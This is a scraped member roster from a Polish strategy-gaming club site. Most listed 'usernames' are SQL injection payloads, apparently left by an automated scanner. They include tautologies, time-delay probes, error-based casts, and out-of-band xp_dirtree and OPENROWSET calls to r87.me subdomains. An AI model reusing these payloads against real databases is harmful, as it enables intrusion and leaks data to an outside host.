LOGOWANIE
Zarejestruj sie
KADRA
Spis członków elitarnego klub miłośników gier strategicznych. Czyli tajne archiwa ze spisem aktywnych żołnierzy SVV.
SPIS
NAZWA STOPIEŃ GWIAZDKI
larrystanley Szeregowy 0
darkman Szeregowy 0
matsen Szeregowy 0
kecaj10 Szeregowy 0
malorolny Szeregowy 0
jondzior Szeregowy 0
Williamhawk Szeregowy 0
Necrokosiarz Szeregowy 0
Smith Szeregowy 0
1 OR 1=1 Szeregowy 0
%27 Szeregowy 0
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) Szeregowy 0
NS1NO Szeregowy 0
1 AND 'NS='ss Szeregowy 0
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' Szeregowy 0
1' OR 1=1 OR 'ns'='ns Szeregowy 0
1 OR 17-7=10 Szeregowy 0
' WAITFOR DELAY '0:0:25'-- Szeregowy 0
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) Szeregowy 0
1 OR X='ss Szeregowy 0
1' OR 1=1 OR '1'='1 Szeregowy 0
1 WAITFOR DELAY '0:0:25'-- Szeregowy 0
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' Szeregowy 0
exec('xp_dirtree ''\\xnpld-veamjitw5zmazrnhceqvo5cmju_pror-_i'+'2x0.r87.me'+'\c$\a''') Szeregowy 0
WAITFOR DELAY '0:0:25'-- Szeregowy 0
1) WAITFOR DELAY '0:0:25'-- Szeregowy 0
1;exec('xp_dirtree ''\\xnpld-veam_vlgdaebwyuzynotozlgc8lalpoirb'+'a5y.r87.me'+'\c$\a''')-- Szeregowy 0
') WAITFOR DELAY '0:0:25'-- Szeregowy 0
-1';exec('xp_dirtree ''\\xnpld-veamcmh1lrpo3sdwxdxc7cee25lf-t6hqy'+'uck.r87.me'+'\c$\a''')-- Szeregowy 0
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) Szeregowy 0
')) WAITFOR DELAY '0:0:25'-- Szeregowy 0
1) exec('xp_dirtree ''\\xnpld-veamynal4wa-5aygez0ti9llkwntwqnzpt'+'qrq.r87.me'+'\c$\a''')-- Szeregowy 0
NSFTW Szeregowy 0
1)) WAITFOR DELAY '0:0:25'-- Szeregowy 0
1')exec('xp_dirtree ''\\xnpld-veaml6viwepto7b-_axu8s3t-krfezcy0f'+'ws8.r87.me'+'\c$\a''')-- Szeregowy 0
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- Szeregowy 0
'+NSFTW+' Szeregowy 0
1))exec('xp_dirtree ''\\xnpld-veamka4jhwe4n4i0clc01qn8_myjmtc9e9'+'fzo.r87.me'+'\c$\a''')-- Szeregowy 0
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- Szeregowy 0
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- Szeregowy 0
1'))exec('xp_dirtree ''\\xnpld-veamipdfskfiqkv7ypxvviakqt0i7dedvk'+'j-w.r87.me'+'\c$\a''')-- Szeregowy 0
syscolumns WHERE 2>3;exec('xp_dirtree ''\\xnpld-veambedprpy4xel8k7m8pmeg06evvk_1eh'+'g_y.r87.me'+'\c$\a''')-- Szeregowy 0
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- Szeregowy 0
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','xnpld-veamwiywgfriumufzbpajevpx7-2z9_y0i'+'ffw.r87.me')exec sp_executesql @r Szeregowy 0
1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ Szeregowy 0
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','xnpld-veamtgtgtjr03wvpqdfon7udygnuricsze'+'zhq.r87.me')exec sp_executesql @r-- Szeregowy 0
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 Szeregowy 0
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' Szeregowy 0
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','xnpld-veamjaro2ukalz1dgq92rbqjt_s_jxthcm'+'c0y.r87.me')exec sp_executesql @r-- Szeregowy 0
((select sleep(25)))a-- 1 Szeregowy 0